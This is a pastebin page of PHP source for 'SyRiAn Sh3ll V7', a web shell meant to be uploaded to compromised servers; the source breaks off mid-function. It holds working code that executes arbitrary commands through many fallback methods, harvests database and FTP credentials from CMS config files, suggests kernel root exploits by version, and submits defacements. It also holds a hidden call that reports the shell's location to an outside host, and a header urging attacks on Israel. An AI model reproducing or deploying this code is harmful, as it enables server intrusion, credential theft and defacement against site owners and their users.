SyRiAn Sh3ll V7

From RubberDuck, 4 Years ago, written in Plain Text, viewed 6'481 times.
URL http://paste.security-portal.cz/view/bcac15c8 Embed
Download Paste or View Raw
  1. #  .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  2. #  ,--^----------,--------,-----,-------^--,
  3. #  | |||||||||   `--------'     |          O    .. SyRiAn Sh3ll V7 ....  
  4. #  `+---------------------------^----------|
  5. #    `\_,-------, __EH << SyRiAn | 34G13__|
  6. #      / XXXXXX /`|     /
  7. #     / XXXXXX /  `\   /
  8. #    / XXXXXX /\______(
  9. #   / XXXXXX /!
  10. #  / XXXXXX /!     rep0rt bugz t0: sy34[at]msn[dot]com
  11. # (________(!
  12. #  `-------'
  13. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  14. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  15. #
  16. # SyRiAn Sh3ll V7 .
  17. # Copyright (C) 2011 - SyRiAn 34G13
  18. # This program is free software; you can redistribute it and/or modify
  19. # it under the terms of the GNU General Public License as published by
  20. # the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  21. # This program is distributed in the hope that it will be useful,
  22. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  23. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  24. # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
  25.  
  26. # Coders :
  27. # SyRiAn_34G13 :  sy34@msn.com [ Main Coder ] .
  28. # SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
  29. # Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
  30. #// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
  31.  
  32. $uselogin = 0;   // Make It 0 If you Want To Disable Auth
  33. $user = '';  // Username
  34. $pass = '';  // Password
  35. $shellColor = '#990000'; // Shell Color
  36. #------------------------------------#
  37. #       Powered By SyRiAn Shell      #
  38. #       By EH SyRiAn 34G13           #
  39. #       wWw.syrian-shell.com         #
  40. #       Version 7 - priv8            #
  41. #       Made In SyRiA                #
  42. #------------------------------------#
  43. ?>
  44. <?php
  45. if($_GET['id']== 'logout')
  46. {
  47.         Logout();
  48. }
  49. # ---------------------------------------#
  50. #                SuiCide                 #
  51. #----------------------------------------#
  52. if($_GET['id'] == 100)
  53. {
  54.         echo "<body onload='Suicide();'>";
  55. }
  56. if($_GET['id'] == 'Delete')
  57. {
  58.         Suicide();
  59. }
  60. # ---------------------------------------#
  61. #                Functions               #
  62. #----------------------------------------#
  63. function input($type,$name,$value,$size)
  64. {
  65.         if (empty($value))
  66.         {
  67.                 print "<input type=$type name=$name size=$size>";
  68.         }
  69.         elseif(empty($name)&&empty($size))
  70.         {
  71.                 print "<input type=$type value=$value >";
  72.         }
  73.         elseif(empty($size))
  74.         {
  75.                 print "<input type=$type name=$name value=$value >";
  76.         }
  77.         else
  78.         {
  79.                 print "<input type=$type name=$name value=$value size=$size >";
  80.         }
  81. }
  82. function read_dir($path,$username)
  83. {
  84.         if ($handle = opendir($path))
  85.         {
  86.            while (false !== ($file = readdir($handle)))
  87.            {
  88.                          $fpath="$path$file";
  89.                          if (($file!='.') and ($file!='..'))
  90.                          {
  91.                                 if (is_readable($fpath))
  92.                                 {
  93.                                    $dr="$fpath/";
  94.                                    if (is_dir($dr))
  95.                                    {
  96.                                           read_dir($dr,$username);
  97.                                    }
  98.                                    else
  99.                                    {
  100.                                                 if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
  101.  
  102. ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
  103.                                                 {
  104.                                                    $pass=get_pass($fpath);
  105.                                                    if ($pass!='')
  106.                                                    {
  107.                                                           echo "[+] $fpath\n$pass\n";
  108.                                                           ftp_check($username,$pass);
  109.                                                    }
  110.                                                 }
  111.                                    }
  112.                                 }
  113.                          }
  114.            }
  115.         }
  116. }
  117. function get_pass($link)
  118. {
  119.         @$config=fopen($link,'r');
  120.         while(!feof($config))
  121.         {
  122.            $line=fgets($config);
  123.            if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
  124.            {
  125.                    if (strrpos($line,'"'))
  126.                           $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
  127.                    else
  128.                           $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
  129.                    return $pass;
  130.            }
  131.         }
  132. }
  133. function GetRealIP()
  134. {
  135. $ch = curl_init();
  136. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  137. $urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  138. curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
  139. curl_setopt($ch, CURLOPT_REFERER, $urls);
  140. $html = curl_exec($ch);
  141.     if (getenv(HTTP_X_FORWARDED_FOR))
  142.         {
  143.         $ip=getenv(HTTP_X_FORWARDED_FOR);
  144.     }
  145.         elseif (getenv(HTTP_CLIENT_IP))
  146.         {
  147.         $ip=getenv(HTTP_CLIENT_IP);
  148.     }
  149.         else
  150.         {
  151.            $ip=getenv(REMOTE_ADDR);
  152.         }
  153.     return $ip;
  154. }
  155. function openBaseDir()
  156. {
  157. $openBaseDir = ini_get("open_basedir");
  158. if (!$openBaseDir)
  159.     {
  160.                 $openBaseDir = '<font color="green">OFF</font>';
  161.         }
  162.     else
  163.         {
  164.                 $openBaseDir = '<font color="red">ON</font>';
  165.         }      
  166.         return $openBaseDir;
  167. }
  168. function str_hex($string)
  169. {
  170.         $hex='';
  171.         for ($i=0; $i < strlen($string); $i++)
  172.         {
  173.                 $hex .= dechex(ord($string[$i]));
  174.         }
  175.         return $hex;
  176. }
  177. function SafeMode()
  178. {
  179.         $safe_mode = ini_get("safe_mode");
  180.         if (!$safe_mode)
  181.     {
  182.                 $safe_mode = '<font color="green">OFF</font>';
  183.         }
  184.     else
  185.         {
  186.                 $safe_mode = '<font color="red">ON</font>';
  187.         }
  188.         return $safe_mode;
  189. }
  190. function currentFileName()
  191. {
  192.         $currentFileName = $_SERVER["SCRIPT_NAME"];
  193.         $currentFileName = Explode('/', $currentFileName);
  194.         $currentFileName = $currentFileName[count($currentFileName) - 1];
  195.         return $currentFileName;
  196. }
  197. function Suicide()
  198. {
  199.         @unlink(currentFileName());
  200. }
  201. function rootxpL()
  202. {
  203.         $v=@php_uname();
  204.         $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
  205.  
  206. h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
  207.  
  208. krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
  209.  
  210. krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
  211.  
  212. ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
  213.  
  214. uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2,
  215.  
  216. ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
  217.  
  218. kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
  219.  
  220. uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
  221.         foreach($db as $k=>$x)if(strstr($v,$k))return $x;
  222.         if(!$xpl)$xpl='<font color="red">Not found.</font>';
  223.         return $xpl;
  224. }
  225. function PostgreSQL()
  226. {
  227.         if(@function_exists('pg_connect'))
  228.         {
  229.                 $postgreSQL = '<font color="red">ON</font>';
  230.         }
  231.         else
  232.         {
  233.                 $postgreSQL = '<font color="green">OFF</font>';
  234.         }
  235.         return $postgreSQL;
  236. }
  237. function Oracle()
  238. {
  239.         if(@function_exists('ocilogon'))
  240.         {
  241.                 $oracle = '<font color="red">ON</font>';
  242.         }
  243.         else
  244.         {
  245.                 $oracle = '<font color="green">OFF</font>';
  246.         }
  247.         return $oracle;
  248. }
  249. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  250. {
  251.         $k = curl_init();
  252.         curl_setopt($k, CURLOPT_URL, $url);
  253.         curl_setopt($k,CURLOPT_POST,true);
  254.         curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  255.         curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  256.         curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  257.         $kubra = curl_exec($k);
  258.         curl_close($k);
  259.         return $kubra;
  260. }
  261. function MsSQL()
  262. {
  263.         if(@function_exists('mssql_connect'))
  264.         {
  265.                 $msSQL = '<font color="red">ON</font>';
  266.         }
  267.         else
  268.         {
  269.                 $msSQL = '<font color="green">OFF</font>';
  270.         }
  271.         return $msSQL;
  272. }
  273. function MySQL2()
  274. {
  275.         $mysql_try = function_exists('mysql_connect');
  276.         if($mysql_try)
  277.         {
  278.                 $mysql = '<font color="red">ON</font>';
  279.         }
  280.         else
  281.         {
  282.                 $mysql = '<font color="green">OFF</font>';
  283.         }
  284.         return $mysql;
  285. }
  286. function Gzip()
  287. {
  288.         if (function_exists('gzencode'))
  289.         {
  290.                 $gzip = '<font color="red">ON</font>';
  291.         }
  292.         else
  293.         {
  294.                 $gzip = '<font color="green">OFF</font>';
  295.         }
  296.         return $gzip;
  297. }
  298. function MysqlI()
  299. {
  300.         if (function_exists('mysqli_connect'))
  301.         {
  302.                 $mysqli = '<font color="red">ON</font>';
  303.         }
  304.         else
  305.         {
  306.                 $mysqli = '<font color="green">OFF</font>';
  307.         }
  308.         return $mysqli;
  309. }
  310. function MSQL()
  311. {
  312.         if (function_exists('msql_connect'))
  313.         {
  314.                 $mSql = '<font color="red">ON</font>';
  315.         }
  316.         else
  317.         {
  318.                 $mSql = '<font color="green">OFF</font>';
  319.         }
  320.         return $mSql;
  321. }
  322. function SQlLite()
  323. {
  324.         if (function_exists('sqlite_open'))
  325.         {
  326.                 $SQlLite = '<font color="red">ON</font>';
  327.         }
  328.         else
  329.         {
  330.                 $SQlLite = '<font color="green">OFF</font>';
  331.         }
  332.         return $SQlLite;
  333. }
  334. function tulis($file,$text)
  335. {
  336.         $textz = gzinflate(base64_decode($text));
  337.         if($filez = @fopen($file,"w"))
  338.         {
  339.                 @fputs($filez,$textz); @fclose($file);
  340.         }
  341. }
  342. function RegisterGlobals()
  343. {
  344.         if(ini_get('register_globals'))
  345.         {
  346.                 $registerg= '<font color="red">ON</font>';
  347.         }
  348.         else
  349.         {
  350.                 $registerg= '<font color="green">OFF</font>';
  351.         }
  352.         return $registerg;
  353. }
  354. function HardSize($size)
  355. {
  356.         if($size >= 1073741824)
  357.         {
  358.                 $size = @round($size / 1073741824 * 100) / 100 . " GB";
  359.         }
  360.         elseif($size >= 1048576)
  361.         {
  362.                 $size = @round($size / 1048576 * 100) / 100 . " MB";
  363.         }
  364.         elseif($size >= 1024)
  365.         {
  366.                 $size = @round($size / 1024 * 100) / 100 . " KB";
  367.         }
  368.         else
  369.         {
  370.                 $size = $size . " B";
  371.         }
  372.         return $size;
  373. }
  374. function Curl()
  375. {
  376.         if(extension_loaded('curl'))
  377.         {
  378.                 $curl = '<font color="red">ON</font>';
  379.         }
  380.         else
  381.         {
  382.                 $curl = '<font color="green">OFF</font>';
  383.         }
  384.         return $curl;
  385. }
  386. function DecryptConfig()
  387. {
  388.         @include("DecryptConfig.php");
  389.         if($_POST['ScriptType'] == 'vb')
  390.         {
  391.                 $dbName = $config['Database']['dbname'];
  392.                 $prefix = $config['Database']['tableprefix'];
  393.                 $email = $config['Database']['technicalemail'];
  394.                 $host = $config['MasterServer']['servername'];
  395.                 $port = $config['MasterServer']['port'];
  396.                 $user = $config['MasterServer']['username'];
  397.                 $pass = $config['MasterServer']['password'];
  398.                 $admincp = $config['Misc']['admincpdir'];
  399.                 $modecp = $config['Misc']['modcpdir'];
  400.         }
  401.                 elseif($_POST['ScriptType'] == 'wp')
  402.                 {
  403.                         $dbName = DB_NAME;
  404.                         $prefix = $table_prefix;
  405.                         $host = DB_HOST;
  406.                         $user = DB_USER;
  407.                         $pass = DB_PASS;
  408.                 }      
  409.                 elseif($_POST['ScriptType'] == 'jos')
  410.                 {
  411.                         $dbName = $db;
  412.                         $prefix = $dbprefix;
  413.                         $email = $mailfrom;
  414.                         $host = $host;
  415.                         $user = $user;
  416.                         $pass = $password;
  417.                 }
  418.                 elseif($_POST['ScriptType'] == 'phpbb')
  419.                 {
  420.                         $host = $dbhost;
  421.                         $port = $dbport;
  422.                         $dbName = $dbname;
  423.                         $user = $dbuser;
  424.                         $pass = $dbpasswd;
  425.                         $prefix = $table_prefix;
  426.                 }
  427.                 elseif($_POST['ScriptType'] == 'ipb')
  428.                 {
  429.                         $host = $INFO['sql_host'];
  430.                         $dbName = $INFO['sql_database'];
  431.                         $user = $INFO['sql_user'];
  432.                         $pass = $INFO['sql_pass'];
  433.                         $prefix = $INFO['sql_tbl_prefix'];
  434.                 }
  435.                 elseif($_POST['ScriptType'] == 'smf')
  436.                 {
  437.                         $dbName = $db_name;
  438.                         $pass = $db_passwd;
  439.                         $prefix = $db_prefix;
  440.                         $host = $db_server;
  441.                         $user = $db_user;
  442.                         $email = $webmaster_email;
  443.                 }
  444.                 elseif($_POST['ScriptType'] == 'mybb')
  445.                 {
  446.                         $host = $config['database']['hostname'];
  447.                         $user = $config['database']['username'];
  448.                         $pass = $config['database']['password'];
  449.                         $dbName = $config['database']['database'];
  450.                         $prefix = $config['database']['table_prefix'];
  451.                         $admincp = $config['admin_dir'];
  452.                         $prefix = $config['database']['table_prefix'];
  453.                 }
  454.  
  455.         echo '
  456. #-------------------------------#
  457. #      Config Informations      #
  458. #-------------------------------#
  459. Host : '.$host.'
  460. DB Name : '.$dbName.'
  461. DB User : '.$user.'
  462. DB Pass : '.$pass.'
  463. Prefix : '.$prefix.'
  464. Email : '.$email.'
  465. Port : '.$port.'
  466. ACP : '.$admincp.'
  467. MCP : '.$modecp.'
  468. ';
  469. }
  470. function footer()
  471. {
  472.         echo '<table bgcolor="#cccccc" width="100%"><tr>
  473.         <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
  474.         <center><font color="gray" size="-2"><b>
  475.  
  476.  
  477.         </font><font color="gray"></font><font color="#990000">
  478.         </font><font color="gray"></font><font color="#990000"> v7 Features;
  479.         </font></b>
  480.         </td>
  481.         </tr></table>
  482.         </tbody></table>
  483.         <a name="down"></a>
  484.         </body></html>
  485.         ';
  486. }
  487. function whereistmP()
  488. {
  489.         $uploadtmp=ini_get('upload_tmp_dir');
  490.         $uf=getenv('USERPROFILE');
  491.         $af=getenv('ALLUSERSPROFILE');
  492.         $se=ini_get('session.save_path');
  493.         $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  494.         if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  495.         if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  496.         if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  497.         if(is_dir($uf) && is_writable($uf))return $uf;
  498.         if(is_dir($af) && is_writable($af))return $af;
  499.         if(is_dir($se) && is_writable($se))return $se;
  500.         if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  501.         if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  502.         return '.';
  503. }
  504. function winshelL($command)
  505. {
  506.         $name=whereistmP()."\\".uniqid('NJ');
  507.         win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  508.         sleep(1);
  509.         $exec=file_get_contents($name);
  510.         unlink($name);
  511.         return $exec;
  512. }
  513. function update()
  514. {
  515.         echo "[+] Update Has D0n3 ^_^";
  516. }
  517. function srvshelL($command)
  518. {
  519.         $name=whereistmP()."\\".uniqid('NJ');
  520.         $n=uniqid('NJ');
  521.         $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  522.         win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  523.         win32_start_service($n);
  524.         win32_stop_service($n);
  525.         win32_delete_service($n);
  526.         while(!file_exists($name))sleep(1);
  527.         $exec=file_get_contents($name);
  528.         unlink($name);
  529.         return $exec;
  530. }
  531. function ffishelL($command)
  532. {
  533.         $name=whereistmP()."\\".uniqid('NJ');
  534.         $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  535.         $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  536.         while(!file_exists($name))sleep(1);
  537.         $exec=file_get_contents($name);
  538.         unlink($name);
  539.         return $exec;
  540. }
  541. function comshelL($command,$ws)
  542. {
  543.         $exec=$ws->exec("cmd.exe /c $command");
  544.         $so=$exec->StdOut();
  545.         return $so->ReadAll();
  546. }
  547. function perlshelL($command)
  548. {
  549.         $perl=new perl();
  550.         ob_start();
  551.         $perl->eval("system(\"$command\")");
  552.         $exec=ob_get_contents();
  553.         ob_end_clean();
  554.         return $exec;
  555. }
  556. function Exe($command)
  557. {
  558.         global $windows;
  559.         $exec=$output='';
  560.         $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  561.         if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
  562.         elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
  563.         elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
  564.         elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
  565.         elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
  566.         elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
  567.  
  568. $output;proc_close($res);}
  569.         elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
  570.         elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
  571.         elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
  572.         elseif(extension_loaded('perl'))$exec=perlshelL($command);
  573.         return $exec;
  574. }
  575. function magicQouts()
  576. {
  577.         $mag=get_magic_quotes_gpc();
  578.         if (empty($mag))
  579.         {
  580.                 $mag = '<font color="green">OFF</font>';
  581.         }
  582.         else
  583.         {
  584.                 $mag= '<font color="red">ON</font>';
  585.         }
  586.         return $mag;
  587. }
  588. function DisableFunctions()
  589. {
  590.         $disfun = ini_get('disable_functions');
  591.         if (empty($disfun))
  592.         {
  593.                 $disfun = '<font color="green">NONE</font>';
  594.         }
  595.         return $disfun;
  596. }
  597. function SelectCommand($os)
  598. {
  599.         if($os == 'Windows')
  600.         {
  601.                 echo "
  602.                 <select name=alias >
  603.                 <option value=''>NONE</option> 
  604.                 <option value='dir' >List Directory</option>
  605.                 <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  606.                 <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  
  607.  
  608. &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
  609.                 <option value='netstat -an'>Show active connections</option>
  610.                 <option value='net start'>Show running services</option>
  611.                 <option value='tasklist'>Show Pro</option>
  612.                 <option value='net user'>User accounts</option>
  613.                 <option value='net view'>Show computers</option>
  614.                 <option value='arp -a'>ARP Table</option>
  615.                 <option value='ipconfig /all'>IP Configuration</option>
  616.                 <option value='netstat -an'>netstat -an</option>
  617.                 <option value='systeminfo'>System Informations</option>
  618.                 <option value='getmac'>Get Mac Address</option>
  619.                 </select>
  620.                 ";
  621.         }
  622.         else
  623.         {
  624.                 echo "
  625.                 <select name=alias >
  626.                 <option value=''>NONE</option> 
  627.                 <option value='ls -la'>List dir</option>
  628.                 <option value='cat /etc/hosts'>IP Addresses</option>
  629.                 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  630.                 <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  631.                 <option value='netstat -an | grep -i listen'>show opened ports</option>
  632.                 <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  633.                 <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  634.                 <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  635.                 <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  636.                 <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  637.                 <option value='find / -type f -name \"config*\"'>find config* files</option>
  638.                 <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  639.                 <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  640.                 <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  641.                 <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  642.                 <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  643.                 <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  644.                 <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  645.                 <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  646.                 <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  647.                 <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  648.                 <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  649.                 <option value='locate httpd.conf'>locate httpd.conf files</option>
  650.                 <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  651.                 <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  652.                 <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  653.                 <option value='locate my.conf'>locate my.conf files</option>
  654.                 <option value='locate admin.php'>locate admin.php files</option>
  655.                 <option value='locate cfg.php'>locate cfg.php files</option>
  656.                 <option value='locate conf.php'>locate conf.php files</option>
  657.                 <option value='locate config.dat'>locate config.dat files</option>
  658.                 <option value='locate config.php'>locate config.php files</option>
  659.                 <option value='locate config.inc'>locate config.inc files</option>
  660.                 <option value='locate config.inc.php'>locate config.inc.php</option>
  661.                 <option value='locate config.default.php'>locate config.default.php files</option>
  662.                 <option value='locate config'>locate config* files </option>
  663.                 <option value='locate \'.conf\''>locate .conf files</option>
  664.                 <option value='locate \'.pwd\''>locate .pwd files</option>
  665.                 <option value='locate \'.sql\''>locate .sql files</option>
  666.                 <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
  667.                 <option value='locate \'.bash_history\''>locate .bash_history files</option>
  668.                 <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
  669.                 <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
  670.                 <option value='locate backup'>locate backup files</option>
  671.                 <option value='locate dump'>locate dump files</option>
  672.                 <option value='locate priv'>locate priv files</option>
  673.                 </select>
  674.                 ";
  675.         }
  676. }
  677. function GenerateFile($name,$content)
  678. {
  679.         $file = @fopen($name,"w+");
  680.         @fwrite($file,$content);
  681.         @fclose($file);
  682.         return true;
  683. }
  684. function which($pr)
  685. {
  686.         $path = Exe("which $pr");
  687.         if(!empty($path))
  688.         {
  689.                 return trim($path);
  690.         }
  691.         else
  692.         {
  693.                 return trim($pr);
  694.         }
  695. }
  696. function checkfunctioN($func)
  697. {
  698.         global $disablefunctions,$safemode;
  699.         $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
  700.         if($safemode=='ON' && in_array($func,$safe))return 0;
  701.         elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
  702.         return 0;
  703. }
  704. function CSS($shellColor)
  705. {
  706.  
  707.         $css =  "
  708.         <html dir=rtl>
  709.         <head>
  710.         <title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
  711.         <link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
  712.         <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
  713.         <style>
  714.         BODY
  715.         {
  716.                 FONT-FAMILY: Verdana;
  717.                 margin: 2;
  718.                 color: #cccccc;
  719.                 background-color: #000000;
  720.         }
  721.         sy  
  722.         {
  723.                 color:".$shellColor.";
  724.                 font-size:7pt;
  725.                 font-weight: bold;
  726.         }
  727.         #Box
  728.         {
  729.         color:".$shellColor.";
  730.         font-size:14px;
  731.         background-color:#000;
  732.         font-weight:bold;
  733.         }
  734.         tr
  735.         {
  736.         BORDER-RIGHT:  #cccccc 1px solid;
  737.         BORDER-TOP:    #cccccc 1px solid;
  738.         BORDER-LEFT:   #cccccc 1px solid;
  739.         BORDER-BOTTOM: #cccccc 1px solid;
  740.         color: #ffffff;
  741.         }
  742.         td
  743.         {
  744.         BORDER-RIGHT:  #cccccc 1px solid;
  745.         BORDER-TOP:    #cccccc 1px solid;
  746.         BORDER-LEFT:   #cccccc 1px solid;
  747.         BORDER-BOTTOM: #cccccc 1px solid;
  748.         color: #cccccc;
  749.         }
  750.         .table1
  751.         {
  752.         BORDER: 1px none;
  753.         BACKGROUND-COLOR: #000000;
  754.         color: #333333
  755.         }
  756.         .td1
  757.         {
  758.         BORDER: 1px none;
  759.         color: #ffffff; font-style:normal;
  760.         font-variant:normal;
  761.         font-weight:normal;
  762.         font-size:7pt;
  763.         font-family:tahoma
  764.         }
  765.         .tr1
  766.         {
  767.         BORDER: 1px none;
  768.         color: #cccccc;
  769.         }
  770.         table
  771.         {
  772.         BORDER:  #eeeeee  outset;
  773.         BACKGROUND-COLOR: #000000;
  774.         color: #cccccc;
  775.         }
  776.         input
  777.         {
  778.         BORDER-RIGHT:  ".$shellColor." 1px solid;
  779.         BORDER-TOP:    ".$shellColor." 1px solid;
  780.         BORDER-LEFT:   ".$shellColor." 1px solid;
  781.         BORDER-BOTTOM: ".$shellColor." 1px solid;
  782.         BACKGROUND-COLOR: #333333;
  783.         font: 9pt tahoma;
  784.         color: #ffffff;
  785.         }
  786.         select
  787.         {
  788.         BORDER-RIGHT:  #ffffff 1px solid;
  789.         BORDER-TOP:    #999999 1px solid;
  790.         BORDER-LEFT:   #999999 1px solid;
  791.         BORDER-BOTTOM: #ffffff 1px solid;
  792.         BACKGROUND-COLOR: #000000;
  793.         font: 9pt tahoma;
  794.         color: #CCCCCC;;
  795.         }
  796.         submit
  797.         {
  798.         BORDER:  1px outset buttonhighlight;
  799.         BACKGROUND-COLOR: #272727;
  800.         width: 40%;
  801.         color: #cccccc;
  802.         }
  803.         textarea
  804.         {
  805.         BORDER-RIGHT:  #ffffff 1px solid;
  806.         BORDER-TOP:    #999999 1px solid;
  807.         BORDER-LEFT:   #999999 1px solid;
  808.         BORDER-BOTTOM: #ffffff 1px solid;
  809.         BACKGROUND-COLOR: #333333;
  810.         color: #ffffff;
  811.         }
  812.         A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
  813.         A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
  814.         A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
  815.         A:hover {color:blue;TEXT-DECORATION: none}
  816.         </style>
  817.         <script>
  818.         function Suicide()
  819.         {
  820.         var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
  821.         if(confimrSuicide == true)
  822.         {
  823.         document.location='".currentFileName()."?id=Delete';
  824.         }
  825.         else {document.location='".currentFileName()."';}
  826.         }
  827.         </script>
  828.         </head>";
  829.         if($_GET['id'] == '')
  830.         {
  831.                         $css .=  "<script>window.location = '?id=mainPage';</script>";
  832.         }
  833.         return $css;
  834. }
  835. function Logout()
  836. {
  837.         print"<script>
  838.         document.cookie='user=';
  839.         document.cookie='pass=';
  840.         var url = window.location.pathname;
  841.         var filename = url.substring(url.lastIndexOf('/')+1);
  842.         window.location=filename;
  843.         </script>";
  844. }
  845.  
  846. function About()
  847. {
  848.         $about = "
  849. <table bgcolor=#cccccc width=\"100%\">
  850. <tbody><tr><td width=1025>
  851. <div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
  852. </div>
  853. <sy><div align=center>Coded By :  EH << SyRiAn | 34G13</div></sy>
  854. <sy><div align=center>From </font>: SyRiAn Arabic Republic  </div></sy>
  855. <sy><div align=center>Age : 4/1991<br></div></sy>
